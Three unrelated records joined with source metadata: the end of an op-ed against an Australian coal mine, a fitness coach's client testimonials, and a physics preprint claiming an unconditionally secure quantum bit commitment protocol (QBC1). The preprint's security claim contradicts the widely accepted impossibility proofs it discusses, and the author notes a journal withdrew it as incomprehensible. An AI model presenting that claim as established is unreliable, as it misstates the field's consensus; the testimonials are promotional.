People are engaged and will take action to preserve the climate, the Great Barrier Reef and the rights of the traditional owners whose land will be destroyed by this mine, in ways that haven’t been seen before.
In my many visits there, I have found Australians to be obliging and deeply passionate about protecting their unique environment. Never has the contrast between the fossil fuel present and the clean energy future been in such stark relief. I now implore all Australians to take a stand – for the sake of the world’s climate – to ensure this mine never goes ahead.
|
{
"pile_set_name": "OpenWebText2"
}
|
Success Stories
Have a look at all coaching transformations
words of happiness
Testimonials
My weaknesses have become my strengths, my failures have become my successes and my pain has become my light as I began to know myself better each week of coaching with Amanda. I faced my fears and they went from insurmountable mountains to little hills. For me what meant the most was the heart Amanda showed me. Her guidance and heart pushed my broken spirit into a renewed life plan, full of accountability for myself.
— Laura, client
Testimonials
I started working with Amanda to get in shape and feel confident on my wedding day. With a lifetime of fad diets, cleanses, diet pills, low fat, sugar free, you name it, my body was a mess inside and out. Amanda helped me focus on nutrition; I learned how to choose foods that nourish my body while working on my mindset.
- Kayla
Working with Amanda was one of the best investments that I have ever made for myself. By changing my diet drastically and stepping inside the gym for the first time, I learned how to properly fuel my body and became empowered to take care of myself. And most importantly, Amanda helped me learn how to make good choices for myself physically, mentally, emotionally and spiritually.
– Stephanie
Amanda has helped me implement lifestyle changes that work for me and my daily life so that I am successful in reaching my goals. I can honestly say that I have never felt better, not only physically, but more importantly, I have learned to love myself for the person that was inside all along.
- Brittany
Being the mother of three small boys, I wasn’t sure I would be able to achieve my goals and still be a great mom to my kids. What I have loved about this process is that Amanda does all of the thinking and planning for me. I am amazed I have been able to get the results I have always wanted-all while juggling the demands of family life.
– Kacey
Amanda helped change my life in so many ways I can't begin to sum them all up! I've managed to improve my mental health, strengthen my relationship with my boyfriend and be more confident overall. Thank you, thank you, thank you!
- Keri F
With Amanda I was able to express and share my episodes of frustration and feelings of wanting to give up. She was always there to pick me back up and set me straight. Over the course of my journey to wellness with Amanda, I completely changed my physique and can now comfortably wear a bikini!
- Melanie
I saw incredible results in my body and felt so much better physically and mentally. My body feels strong and my muscles have never been so developed and toned! There were many times that I would focus on the numbers (weight, measuring tape) and become discouraged, but Amanda taught me to trust the process, forget about the numbers, and how to feel my way to positive results. I feel the healthiest I have ever been in my life! There is no other person who could be as supportive, encouraging, and motivating than Amanda! It is so apparent that she is beyond educated and passionate about her job and her clients!
— Jennifer
AMANDA'S
Diary of a Coach
JESSICA
Jessica is post pregnancy and on a mission. After just 12 weeks of Online Coaching, she is now in her pre-baby clothes, 15lbs lighter, gaining muscle and has learned easy ways to prep meals for both herself and her family while still living life and enjoying being social.
JILL
Week 1 to Week 4 of Online Coaching. Not only was she able to drop 9lbs, 2.5 inches from her waist and 2.5 inches from her hips, but she now fits perfectly in her wedding dress and feels incredible!
STEPHANIE
Enough was enough: she wanted to feel better, so she took the reins and completely revamped her lifestyle. From a new daily regimen, to learning how to make her own food, step by step we created weekly goals that allowed her to be successful as she created an entirely new way of living.
DARA
This is just the beginning for this chef. Surrounded by food day in and day out, she used to find it challenging to make any headway towards her health goals. Using flexible dieting to find balance and switching from all cardio to focusing on resistance training, she has made great changes in her physique to date. While the scale has only decreased in weight by 3lbs, she has lost more than 10 inches all over her body.
LORI
After 6 weeks of Online Coaching, Lori has lost 16lbs, 3 inches from her waist and 3 inches from her hips. Her dedication to herself, inner strength, perseverance and the ability to no longer allow outside stresses of life affect her health have allowed her to make these external changes, for these are the icing on the cake to all she has accomplished on the inside.
LESIA
This single mom and career woman has found that having a routine and being held accountable are key for keeping her on track towards her goals. Through family meal prep and including her kids in her workouts, she has created a new foundation of healthy habits for not only herself, but her family.
|
{
"pile_set_name": "Pile-CC"
}
|
---
abstract: 'This article describes a quantum bit commitment protocol, QBC1, based on entanglement destruction via forced measurements and proves its unconditional security.'
author:
- |
\
\
Horace P. Yuen\
Department of Electrical Engineering and Computer Science\
Department of Physics and Astronomy\
Northwestern University, Evanston Il. 60208\
yuen@eecs.northwestern.edu
title: An Unconditionally Secure Quantum Bit Commitment Protocol
---
**Note:** This paper is an elaboration of my 2006 QCMC paper, arXiv:0702074v4 (2007), published in its Proceedings volume. It was submitted in Dec 2009 as an “invited paper” to a journal, and was withdrawn half a year later because the editors found it incomprehensible. I hope it may make better sense to some other readers.
My reasons for the impossibility of QBC “impossibility proofs” are described in ref \[1\]. Over the years I have produced several QBC protocols that I thought were secure, but when concealing they are not binding due to the scope of entanglement attack that works even across teleportation. I did not and do not see such scope spelled out anywhere, though before putting such papers on the arXiv I should have tried harder to find out whether entanglement attack works in my cases, which I eventually did. Since 2003 I have not received any substantial negative comment on my QBC arXiv papers, only getting a few questions and agreements, and thus the arXiv papers have not served the purpose of soliciting technical disagreements I sought in this controversial subject.
I have been as sure that the present protocol is secure as most results I ever published, but I knew the environment of disagreement and did not submit any QBC paper to any journal until Dec 2009. If this present paper is indeed incomprehensible, it would have to be expanded before submission to a journal. In the meantime a QBC possibility paper by G. P. He, J. Phys. A: Math. Theor. 44, 445305 (2011) has appeared in a reputable journal. That protocol is based on an entirely different mechanism from that of this paper, and gives a weaker form of security. Generally, the best a QBC impossibility proof can do is to show a certain type of QBC protocols cannot be unconditionally secure. It cannot show general impossibility for the simple reason that not all QBC protocols can be captured in any mathematical formulation just within nonrelativistic quantum mechanics \[1\].
My view is that QBC can actually be practically developed and it could perform cryptographic functions with security that is impossible to achieve classically. However, it would not be through the impractical protocol of this paper and the security would not be “unconditional” which is never needed in practice. It appears such QBC development is only possible after the entrenched contrary view on unconditionally secure QBC is sufficiently softened up. I hope this paper would contribute to such end.
Introduction {#sec:intro}
============
It is nearly universally accepted that unconditionally secure quantum bit commitment (QBC) is impossible. This is taken to be a consequence of the Einstein-Podolsky-Rosen (EPR) type entanglement cheating. For a detailed discussion with historical remarks on the impossibility of secure QBC and the various impossibility proofs, see refs [@yuen1]-[@dariano07]. In the following, a new approach is described that lies outside the formulation of these impossibility proofs. A secure QBC protocol, to be called QBC1, is presented together with a full proof of its unconditional security. This paper is completely self-contained apart from background knowledge of quantum mechanics.
QBC Formulation and the Impossibility Proof {#sec:form}
===========================================
In a [*bit commitment*]{} scheme, one party, Alice, provides another party, Bob, with a piece of evidence that she has chosen a bit (0 or 1) which is committed to him. Later, Alice would [*open*]{} the commitment by revealing the bit to Bob and convincing him that it is indeed the committed bit with the evidence in his possession and whatever further evidence Alice then provides, which he can [*verify*]{}. The usual concrete example is for Alice to write down the bit on a piece of paper, which is then locked in a safe to be given to Bob, while keeping for herself the safe key that can be presented later to open the commitment. The scheme should be [*binding*]{}, i.e., after Bob receives his evidence corresponding to a given bit value, Alice should not be able to open a different one and convince Bob to accept it. It should also be [*concealing*]{}, i.e., Bob should not be able to tell from his evidence what the bit is. Otherwise, either Alice or Bob would be able to cheat successfully.
In standard cryptography, secure bit commitment is to be achieved either through a trusted third party, or by invoking an unproved assumption concerning the complexity of certain computational problems. By utilizing quantum effects, specifically the intrinsic uncertainty of a quantum state, various QBC schemes not involving a third party have been proposed to be unconditionally secure, in the sense that neither Alice nor Bob could cheat with any significant probability of success as a matter of physical laws. In 1995-1996, a supposedly general proof on the impossibility of unconditionally secure QBC and the insecurity of previously proposed protocols were presented [@may1]-[@lc1]. Henceforth it has been generally accepted that secure QBC and related objectives are impossible as a matter of principle [@lc2]-[@sr].
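The classical route just mentioned can be made concrete. The following is a minimal illustrative sketch (not part of any protocol in this paper) of a standard hash-based commitment, whose concealing and binding properties rest on unproved computational assumptions about the hash function rather than on physical law:

```python
import hashlib
import secrets

def commit(bit: int) -> tuple[bytes, bytes]:
    """Alice commits to a bit: returns (evidence for Bob, key Alice keeps)."""
    nonce = secrets.token_bytes(32)  # high-entropy blinding value (the "safe key")
    evidence = hashlib.sha256(bytes([bit]) + nonce).digest()
    return evidence, nonce

def verify(evidence: bytes, bit: int, nonce: bytes) -> bool:
    """Bob checks the opened (bit, nonce) against the evidence he holds."""
    return hashlib.sha256(bytes([bit]) + nonce).digest() == evidence

evidence, key = commit(1)
assert verify(evidence, 1, key)      # honest opening succeeds
assert not verify(evidence, 0, key)  # Alice cannot open the other bit value
```

Concealing here depends on preimage resistance and binding on collision resistance of SHA-256; both are only computational, in contrast to the unconditional security sought in this paper.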
There is basically just one impossibility proof, which gives the EPR attacks for the cases of equal and nearly equal density operators that Bob has for the two different bit values. The proof purports to show that if Bob’s successful cheating probability $P^B_c$ is close to the value $\frac{1}{2}$, which is obtainable from pure guessing of the bit value, then Alice’s successful cheating probability $P^A_c$ is close to the perfect value 1. The impossibility proof describes the EPR attack on a specific type of protocols, and then argues that all possible QBC protocols are of this type.
The formulation of the standard impossibility proof can be cast as follows. Alice and Bob have available to them two-way quantum communications that terminate in a finite number of exchanges, during which either party can perform any operation allowed by the laws of quantum physics, all processes ideally accomplished with no imperfection of any kind. During these exchanges, Alice would have committed a bit with associated evidence to Bob. It is argued that, at the end of the commitment phase, there is an openly known entangled pure state $\ket{\Phi_\sb}$, $\sb \in \{0,1\}$, shared between Alice who possesses state space $\cH^A$, and Bob who possesses $\cH^B$. For example, if Alice sends Bob one of $M$ possible states $\{
\ket{\phi_{\sb i}} \}$ for bit $\sb$ with probability $p_{\sb i}$, then $$\ket{\Phi_{\sb }} = \sum_i \sqrt{p_{\sb i}}\ket{e_i}\ket{\phi_{\sb i}}
\label{eq:1}$$ with orthonormal $\ket{e_i} \in \cH^A$ and known $\ket{\phi_{\sb i}}
\in \cH^B$. Alice would open by making a measurement on $\cH^A$, say $\{ \ket{e_i} \}$, communicating to Bob her result $i_0$, then Bob would verify by measuring the corresponding projector ${|\phi_{\sb i_0}\rangle\langle \phi_{\sb i_0}|}$ on $\cH^B$.
When classical random numbers known only to one party are used in the commitment, they are to be replaced by corresponding quantum entanglement purification. The commitment of $\ket{\phi_{\sb i}}$ with probability $p_{\sb i}$ in (\[eq:1\]) is, in fact, an example of such purification. Generally, for any random $k$ used by Bob, it is argued from the doctrine of the “Church of the Larger Hilbert Space” that it is to be replaced by the purification $\ket{\Psi}$ in $\cH^{B_1} \otimes \cH^{B_2}$, $$\ket{\Psi} = \sum_k \sqrt{\lambda_k} \ket{f_k}\ket{\psi_k},
\label{eq:2}$$ where $\ket{\psi_k} \in \cH^{B_2}$. The $\{\ket{f_k}\}$ form a complete orthonormal set in $\cH^{B_1}$, kept by Bob, while $\cH^{B_2}$ would be sent to Alice.
For unconditional, rather than perfect, security, one demands that both cheating probabilities $P^B_c - \frac{1}{2}$ and $P^A_c$ can be made arbitrarily small when a security parameter $n$ is increased [@may1]. Thus, [*unconditional security*]{} is quantitatively expressed as $$\qquad \lim_n P^B_c = \frac{1}{2},\quad \lim_n P^A_c = 0.
\label{eq:3}$$ The condition (\[eq:3\]) says that, for any $\epsilon > 0$, there exists an $n_0$ such that for all $n > n_0$, $P^B_c - \frac{1}{2} <
\epsilon$ and $P^A_c < \epsilon$, to which we may refer as $\epsilon$-[*concealing*]{} and $\epsilon$-[*binding*]{}. These cheating probabilities are to be computed purely on the basis of logical and physical laws, and thus would survive any change in technology, including an increase in computational power. In general, one can write down explicitly the optimal $P^B_c$, $$P^B_c = \frac{1}{4}\left(2 + {\| \rho^B_0 - \rho^B_1 \|_1}\right),
\label{eq:4}$$ where ${\| \cdot \|_1}$ is the trace norm, ${\| \tau \|_1} \equiv \tr
(\tau^\dag \tau)^{1/2}$ for a trace-class operator $\tau$.
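Equation (4) is easy to evaluate numerically. The following sketch (an illustration only, not part of the protocol) computes Bob's optimal cheating probability from the trace norm of the difference of two density operators:

```python
import numpy as np

def trace_norm(tau: np.ndarray) -> float:
    # ||tau||_1 = tr (tau^dag tau)^(1/2) = sum of singular values of tau
    return float(np.sum(np.linalg.svd(tau, compute_uv=False)))

def bob_cheat_prob(rho0: np.ndarray, rho1: np.ndarray) -> float:
    # Eq. (4): P^B_c = (2 + ||rho_0 - rho_1||_1) / 4
    return (2.0 + trace_norm(rho0 - rho1)) / 4.0

# Identical states: Bob can do no better than guessing, P^B_c = 1/2.
rho = np.array([[0.5, 0.0], [0.0, 0.5]])
print(bob_cheat_prob(rho, rho))    # 0.5

# Orthogonal pure states |0><0| and |1><1|: trace norm 2, so P^B_c = 1.
rho0 = np.diag([1.0, 0.0])
rho1 = np.diag([0.0, 1.0])
print(bob_cheat_prob(rho0, rho1))  # 1.0
```

The two extreme cases bracket the concealing condition: $\epsilon$-concealing requires $\|\rho^B_0 - \rho^B_1\|_1$ to be small.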
The entanglement cheating mechanism is explicitly spelled out in the impossibility proof. Under perfect concealing $P^B_c=\frac{1}{2}$, it follows from (\[eq:4\]) that the state $\rho^B_b$ at Bob’s possession obeys $\rho^B_0=\rho^B_1$. Hence by the Schmidt decomposition Alice can turn $\ket{\phi_{0i}}$ into $\ket{\phi_{1i}}$ by a unitary transformation on $\cH^A$ in her possession, thus succeeds in cheating perfectly. Under approximate concealing, an explicit transformation on $\cH^A$ can be similarly identified [@yuen2]-[@yuec] which leads to $$4(1-P^B_c)^2 \le P^A_c \le 2 \sqrt{P^B_c
(1-P^B_c)}.
\label{eq:5}$$ The lower bound in (\[eq:5\]) yields the following impossibility result, $$\lim_n P^B_c = \frac{1}{2} \,\, \Rightarrow
\,\, \lim_n P^A_c = 1
\label{eq:6}$$ Note that the impossibility proof makes a stronger statement than the mere impossibility of unconditional security, i.e., (\[eq:6\]) is stronger than (\[eq:3\]) not being possible.
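The implication (6) follows directly from the lower bound in (5): as $P^B_c \to \frac{1}{2}$, the lower bound $4(1-P^B_c)^2 \to 1$. A quick numerical check of the bounds (illustrative only):

```python
def cheat_bounds(pb: float) -> tuple[float, float]:
    """Lower and upper bounds of Eq. (5) on Alice's cheating probability P^A_c."""
    lower = 4.0 * (1.0 - pb) ** 2          # 4 (1 - P^B_c)^2
    upper = 2.0 * (pb * (1.0 - pb)) ** 0.5  # 2 sqrt(P^B_c (1 - P^B_c))
    return lower, upper

# As P^B_c approaches 1/2 (better concealing), both bounds squeeze P^A_c toward 1.
for pb in (0.9, 0.6, 0.51, 0.501):
    lo, hi = cheat_bounds(pb)
    print(f"P^B_c = {pb}: {lo:.4f} <= P^A_c <= {hi:.4f}")
```

At $P^B_c = \frac{1}{2}$ both bounds equal 1, which is exactly the strong statement (6).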
The assumption in the impossibility formulation that $\ket{\Phi_{\sb }}$ are openly known has been challenged. In a multi-pass protocol where Alice and Bob exchange states, each $\ket{\phi_{\sb i}}$ becomes of the form $\ket{\phi_{\sb i k}}$ [@sr] $$\ket{\phi_{\sb ik}} = U^A_{\sb i_n} \ldots U^A_{\sb i_2} U^B_{k_1}
U^A_{\sb i_1} \ket{\phi_0}.
\label{eq:7}$$ where $U^A_{\sb i_l}$ are unitaries that Alice applies and $U^B_{k_j}$ are applied by Bob. The ancilla state $\ket{e_i}$ also separates into $\ket{e^A_i}\ket{e^B_k}$ with $\ket{e^A_i}$ in Alice’s possession and $\ket{e^B_k}$ in Bob’s. It is clear that the exact $\ket{e^B_k}$ may be kept secret by Bob, in an unnormalized form that would include both the entanglement basis and the probability of each state in it. The question is why secure QBC is impossible under such added randomness, whose quantum purification is either unknown to anyone as in the case of classical random number generation from a piece of macroscopic equipment, or at least known only to the party who performs the entanglement purification.
For some discussion of this point of employing unknown randomness, see [@yuec]-[@yueb2] and references cited therein. It turns out that it appears impossible to get a secure protocol with this approach. For the case of perfect concealing, a general proof of this impossibility was given in [@yuen2] for a two-pass protocol. A different argument applicable to multi-pass protocols was given by Ozawa [@oz] and later independently by Cheung [@chau1]. Simple as well as more complicated proofs concerning all natural protocols of this kind in the case of approximate concealing are also available. See [@yuen1]-[@dariano07], [@chau2].
In the above formulation one may consider, *more generally*, the whole $\ket{\Phi_{\sb }}$ of (1) as the state corresponding to the bit with Alice sending $\cH^A$ to Bob at opening who verifies by measuring on the total $\ket{\Phi_{\sb }}$. Similarly in the multi-pass case, (7) is generalized from $\ket{\phi_{\sb ik}}$ to $\ket{\Phi_{\sb ik}}$ with different subspaces of $\cH^A$ and $\cH^B$ being exchanged during each pass. The above quantitative conclusion is not affected. Note, however, that either Alice or Bob has to provide the initial state $\ket{\phi_0}$. Indeed, $\ket{\phi_0}$ must be on a large enough dimension state space and openly known to both parties if either can perform random number purification. It is more convenient to just let each party supply its own state space at each turn when needed, and let $\cH^A$ and $\cH^B$ be their individual total spaces as just indicated. In contrast to one-pass protocols in [@lc1], there is then always the question of “*honesty*” in multi-pass protocols. It is clear that some form of state checking may be necessary to execute these protocols.
New Approach {#sec:newappr}
============
In the impossibility proof formulation, the possibility of interactive checking between Alice and Bob, similar to that in QKD protocols such as BB84, is not explicitly accounted for. Even if Bob’s check on Alice can be postponed to just before opening, Alice’s check on Bob must be carried out during the commitment phase to maintain $\epsilon$-concealing. The implicit assumption must be, therefore, that such checking could be satisfied perfectly without affecting the protocol. In this section, a new approach to QBC protocols is described that shows such an implicit assumption cannot be true. This approach is utilized in the next Section \[sec:qbc1\] to show how a specific secure protocol can be obtained.
Consider the following situation or “protocol": Bob sends Alice a sequence of $n$ qubits, each randomly in one of the two orthogonal states $\ket{l_j}, j \in \{1,2\}$, which are themselves chosen randomly on a fixed great circle $C$ of the qubit Bloch sphere. The index $l$ indicates the position in the $n$-qubit sequence. We assume for convenience that Bob entangled each $l$th qubit to a qubit ancilla he keeps. Alice randomly picks one $\ket{\bar{l}}$, modulates it by $U_{0}=R(\frac{\pi}{2})$ or $U_{1}=R(-\frac{\pi}{2})$, rotation by two different angles on $C$, depending on $\sb\ \in \{0,1\}$, and sends it back to Bob as commitment. Alice opens by sending back the rest and revealing everything. Let $|k\rangle \in
\cH^{A}$ be the orthogonal entanglement ancilla states, $P$ the cyclic shift unitary operator on $n$ qubits, $P^n=I$. Suppose Alice entangles in a minimal way, $$\label{eq:8}
|\Psi_{\sb}\rangle=U_{\sb}\frac{1}{\sqrt{n}}\sum_{k=1}^n|k\rangle\otimes P^{k}|1_{j}\rangle ...|n_{j}\rangle$$ where $|1_{j}\rangle$ is acted on by $U_{\sb}$. This “protocol” can be shown to be $\epsilon$-concealing, and Alice can locally turn $|\Psi_{0}\rangle$ to $|\Psi_{1}\rangle$ near perfectly in a standard entanglement cheating.
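The cyclic-shift structure in (8) can be made concrete in a toy simulation. The sketch below (illustrative only; it takes $n=3$ and an arbitrary product basis state standing in for Bob's qubit sequence, and omits the modulation $U_\sb$) builds the shift operator $P$ on $n$ qubits, checks $P^n = I$, and assembles the minimally entangled state:

```python
import numpy as np

n = 3
dim = 2 ** n

# P cyclically shifts the n qubit positions: |b_1 b_2 b_3> -> |b_3 b_1 b_2>.
P = np.zeros((dim, dim))
for idx in range(dim):
    bits = [(idx >> (n - 1 - q)) & 1 for q in range(n)]  # qubit values, MSB first
    shifted = bits[-1:] + bits[:-1]                      # one cyclic shift
    out = sum(b << (n - 1 - q) for q, b in enumerate(shifted))
    P[out, idx] = 1.0

assert np.allclose(np.linalg.matrix_power(P, n), np.eye(dim))  # P^n = I

# Eq. (8) without U_b: |Psi> = (1/sqrt(n)) sum_k |k> (x) P^k |psi>,
# where the n-dimensional ancilla |k> is kept by Alice.
psi = np.zeros(dim)
psi[1] = 1.0  # stand-in basis state for Bob's n-qubit sequence
Psi = np.zeros(n * dim)
for k in range(1, n + 1):
    Psi[(k - 1) * dim:k * dim] = np.linalg.matrix_power(P, k) @ psi / np.sqrt(n)

assert abs(np.linalg.norm(Psi) - 1.0) < 1e-12  # the state is normalized
```

Because each ancilla value $\ket{k}$ corresponds to one global cyclic shift, fixing the position of a single qubit fixes all the others, which is the property exploited against entanglement cheating below.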
Consider a protocol that adds the following checking to the above. Before opening, Bob asks Alice to send back a fraction $\lambda$, say $\lambda=\frac{1}{2}$, of the $n$ qubits chosen randomly by Bob for checking. If Alice replies that the fraction contains the committed qubit, Bob would ask to check the remaining $1-\lambda$ fraction instead. Assuming Alice has to answer correctly, she must measure on $\cH^A$ to get a specific $\ket{k}$. After Bob’s checking, he still has a uniform distribution over which of his original positions holds the committed qubit. Thus the protocol *remains* $\epsilon$-concealing if $n$ is sufficiently large, while Alice has lost her entanglement cheating capability. This is what was referred to as “the destruction of entanglement for cheating” in several of my previous protocols, beginning with a first one at the 2000 QCMC meeting in Capri, Italy.
Such a ploy did not lead to a secure protocol because the entanglement (\[eq:8\]), or a similar sparsely entangled one, was not insisted upon as part of the protocol prescription. Before discussing in the following how the entanglement (\[eq:8\]) can be enforced, note that Alice can retain her entanglement cheating capability with other entanglements, in particular via the full $n$-permutation group. She could name her entanglement basis vectors $\ket{k}$ by the original positions of the qubits Bob sent, $$\label{eq:9}
\ket{k}\rightarrow\ket{1(k_1),\ldots,n(k_n)}$$ where $l(k_l)$ indicates that original qubit $l$ is at position $k_l$ corresponding to $\ket{k}$. When she is asked to return a fraction $\lambda$ that has positions $\lambda(m)$, $m\in\overline{1-n}$, she would perform a Lüders measurement, that is, a projection $P^{\prime}$ into the subspace in $\cH^A$ that fixes the $\{\lambda(m)\}$ positions. If the entanglement is sufficiently dense, the remaining $1-\lambda$ fraction is still entangled in the remaining ancilla space $(1-P^{\prime})\cH^A$, and entanglement cheating remains possible. With the entanglement (\[eq:8\]) there is no such degeneracy. In fact, $P^{\prime}\cH^A=\cH^A$. Thus, fixing the position of just one qubit already fixes the positions of all the others.
Note that the checking of the ancilla is naturally included in the generalized formulation discussed in the last paragraph of section \[sec:form\]—there is no system or subsystem that cannot be exchanged. The question now is why Alice should entangle as in (\[eq:8\]) rather than in a way which allows her to cheat later. In the QBC literature, with the possible exception of (\[eq:2\]), the claim has always been that even under *honest* following of the protocol prescription, no protocol can be secure [@lc2]-[@sr]. In the presence of interactive checking as above, we have here conclusively shown that such a claim is incorrect.
The “honesty” assumption is widely used in the literature to describe multi-pass protocols, including those for quantum coin tossing [@dk]. It may or may not make sense depending on whether the “honest” action can in principle be checked by the other party without rendering the protocol ineffective. For example, in the simple one-pass protocol of [@lc1], it makes no sense to require Alice to be honest and *not* entangle. It is clear that an actual physical entanglement is needed for the EPR cheating even when the protocol is perfectly concealing. Note that this is in fact the *basis* of the success of checking for preventing entanglement cheating with (\[eq:8\]), that only classical randomness is left after checking. Thus, Alice would entangle anyway in the situation of [@lc1] and the simple protocol that requires such “honesty” is not secure.
In a multi-pass protocol, there is always the question whether “honest entanglement” or any other prescription of the protocol is followed. Even with just a two-pass QBC protocol in which Bob first sends Alice some qubits in prescribed states, including the above “protocol” involving (\[eq:8\]), he can easily cheat by sending in other qubits instead. For example, he could send in identical fixed qubit states and so he would know how to measure to distinguish $\sb=0,1$ from the committed qubit with considerable $P^B_c>\frac{1}{2}$ for any $\{U_0, U_1\}$ pair. He is prevented from such cheating via checking of one form or another.
A crucial question is: what happens when one party is found cheating during protocol execution? Clearly the party cannot be allowed to keep cheating indefinitely, if only because of “intent” [@yuec], since the party does not need to participate to begin with. I have previously described [@app] several approaches to this problem, which has *not* yet received an adequate discussion in the literature but which can be solved in one stroke by an honesty assumption requiring all parties to be perfectly honest in their prescribed actions, so that no cheating would ever be found before opening. This is a perfectly reasonable working assumption for the ideal protocol under discussion, *as long as* the actions can be checked, in view of the discussion just given. It is equivalent to the assignment of infinite penalty in a game-type formulation [@app], and it allows us to bring forth our new point without the burden of technicalities. It is also exactly what has been implicitly assumed in the literature, as we mentioned.
Note that the whole protocol may need to be restarted after a checking. It is easy to see that in the absence of resource constraints, as in all QBC impossibility proof formulations thus far, one party can check the same state an arbitrarily large number of times before proceeding. The total number of checks may grow multiplicatively, not just linearly, with the number of state checkings. It is reasonable to count the cheating detection probability as the party’s failure probability in $P^A_c$ and $P^B_c$. Thus, whenever a bound is imposed on the allowable total number of times a party is caught cheating, an unconditionally secure protocol equivalent to the honesty assumption would be obtained. This is because both $P^A_c$ and $P^B_c$ can be brought arbitrarily close to their prescribed $\epsilon$-level with a large enough number of checkings on each state.
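The geometric decay behind this claim can be made concrete. If each repetition of a state checking independently catches a given cheating strategy with some probability $q$, the probability of surviving $k$ checks is $(1-q)^k$, which can be driven below any $\epsilon$. The figure $q=0.1$ below is an assumed, purely illustrative per-check detection probability:

```python
import math

def checks_needed(q, eps):
    """Number of independent checks so that a cheater caught with
    probability q per check survives all of them with probability <= eps."""
    assert 0 < q < 1 and 0 < eps < 1
    return math.ceil(math.log(eps) / math.log(1 - q))

# e.g. a 10% per-check detection probability driven below eps = 1e-6
k = checks_needed(0.10, 1e-6)
print(k, (1 - 0.10) ** k)   # survival probability after k checks
```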
The point made in this section in connection with (\[eq:8\]) has the following *general implication*, independently of whether a secure protocol can be built on that basis: there is no general impossibility proof showing that the entanglement formed by one party as prescribed by a QBC protocol would retain effective entanglement after checking. In the next section, however, we do exhibit such a specific secure protocol.
Secure Protocol QBC1 {#sec:qbc1}
====================
We consider the following protocol QBC1 [@qbc3], in which Bob sends Alice a sequence of $n$ qubits as described in the last section, requiring Alice to entangle as in (\[eq:8\]). We will show later, in the appropriate places, how that as well as any other prescribed states for Alice and Bob can be checked. That the protocol is $\epsilon$-concealing is intuitively obvious, and can be proved as follows. For simplicity we let the protocol prescribe that each of the qubit states Bob sends is entangled with an ancilla in his possession. Alice can check this before proceeding by asking Bob to send her the qubit ancilla and measuring to verify.\
Concealing Proof for QBC1:
First we assume that Bob does not permutation entangle the $n$ qubits. It is technically messy to show concealing if he does, but the absence of such permutation entanglement can be assured by requiring Bob to permutation entangle as in (\[eq:8\]), which is then destroyed by Alice asking to check one or more of the qubits. That Bob did entangle in such a manner in the first place can be checked by asking him to send in the ancilla for Alice to check.
For simplicity we do not distinguish here between a qubit state and the qubit itself, as is clear from context. Let $a_l$ be the ancilla part of Bob’s state entangled to the $l$th qubit. Then $a_l=\frac{I}{2}$ without the $l$th qubit and $$\label{eq:10}
\rho_\sb=\frac{1}{n}\sum_{l=1}^n a_1\otimes\ldots\otimes(\sigma_\sb a_l)\otimes\cdots\otimes a_n$$
In (\[eq:10\]), $(\sigma_\sb a_l)$ denotes the state obtained by pairing the $l$th ancilla state to the committed qubit, where $\sigma_\sb$ is the committed part of the committed qubit-ancilla entangled pair. We have $(\sigma_\sb a_l)=\sigma_\sb\otimes a_l$ when the pairing is incorrect, but it is a proper qubit-ancilla state when they match. From (\[eq:10\]), $$\label{eq:11}
n(\rho_0-\rho_1)=[(\sigma_0 a_{\bar{l}})-(\sigma_1 a_{\bar{l}})]\otimes_{l\neq \bar{l}} a_l+(\sigma_0-\sigma_1)\otimes_{l}a_l$$
where $\bar{l}$ is the actual position of the committed qubit. Since $\sigma_0=\sigma_1=\frac{I}{2}$ for incorrect matching and $\|(\sigma_0-\sigma_1)\otimes a\|_1=\|\sigma_0-\sigma_1\|_1$ for all density operators $\sigma_0$, $\sigma_1$ and $a$, from (\[eq:11\]) $$\label{eq:12}
\|\rho_0-\rho_1\|_1=\frac{1}{n}\|(\sigma_0 a_{\bar{l}})-(\sigma_1 a_{\bar{l}})\|_1=\frac{2}{n}$$ which can be made arbitrarily small with large $n$. Equation (\[eq:12\]) expresses exactly the intuitively obvious fact that Bob succeeds in cheating when and only when he correctly guesses which of the original qubits is the committed one.\
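The two trace-norm facts underlying (\[eq:12\])—that tensoring with a fixed ancilla state preserves trace distance, and that a distinguishable component of weight $1/n$ dilutes the distance by $1/n$—can be sanity-checked numerically. The randomly generated density operators below are illustrative only, not the protocol's states:

```python
import numpy as np

def rand_density(d, rng):
    # Random density operator: G G^dagger, normalized to unit trace
    g = rng.normal(size=(d, d)) + 1j * rng.normal(size=(d, d))
    rho = g @ g.conj().T
    return rho / np.trace(rho).real

def trace_norm(m):
    # ||M||_1 = sum of singular values
    return np.linalg.svd(m, compute_uv=False).sum()

rng = np.random.default_rng(0)
sigma0, sigma1, a = (rand_density(2, rng) for _ in range(3))

# Fact (a): ||(sigma0 - sigma1) (x) a||_1 = ||sigma0 - sigma1||_1
lhs = trace_norm(np.kron(sigma0 - sigma1, a))
rhs = trace_norm(sigma0 - sigma1)
assert abs(lhs - rhs) < 1e-10

# Fact (b): a weight-1/n distinguishable component dilutes the distance by 1/n
n = 10
chi = rand_density(2, rng)            # common, b-independent part
rho0 = sigma0 / n + (1 - 1 / n) * chi
rho1 = sigma1 / n + (1 - 1 / n) * chi
assert abs(trace_norm(rho0 - rho1) - rhs / n) < 1e-10
```

With orthogonal committed states, $\|\sigma_0-\sigma_1\|_1=2$ and fact (b) reproduces the $2/n$ of (\[eq:12\]).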
Binding Proof for QBC1:
Since $\sigma_\sb=\frac{I}{2}$ without Bob’s ancilla, the probability that Alice can determine the state of the qubit she chooses for commitment is arbitrarily small, given by $\frac{1}{M}$ for $M$ possible states on $C$, and is zero asymptotically. Without the possibility of entanglement cheating, Alice can simply declare the bit she wants to open. In that situation $P^A_c$ is given by the squared inner product of the two possible committed states. With our choice $P^A_c=0$, since the two states for the two different $\sb$ values are orthogonal.\
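That $\sigma_\sb=\frac{I}{2}$ without Bob's ancilla is just the statement that the reduced state of a maximally entangled pair is maximally mixed. A quick numerical check, taking the pair to be $|\Phi^+\rangle$ purely as an illustration:

```python
import numpy as np

# Maximally entangled qubit-ancilla pair |Phi+> = (|00> + |11>)/sqrt(2)
phi = np.zeros(4)
phi[0] = phi[3] = 1 / np.sqrt(2)
rho = np.outer(phi, phi)

# Partial trace over the qubit: indices ordered (qubit, ancilla, qubit', ancilla')
rho4 = rho.reshape(2, 2, 2, 2)
ancilla = np.einsum('iaib->ab', rho4)
print(ancilla)   # the maximally mixed state I/2
```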
Note that, as in the discussion of QBC from the beginning, an $\epsilon$-concealing protocol can be made $\epsilon$-binding with a sequence of committed qubits to obtain a single secure bit, whenever $P^A_c$ is not too close to 1 for each original qubit. In the above QBC1, such a sequence was also indicated for this purpose in our previous version [@qbc3]. It is not needed if the two bit states are orthogonal or nearly orthogonal and if completely random qubit states on $C$ are supplied by Bob.
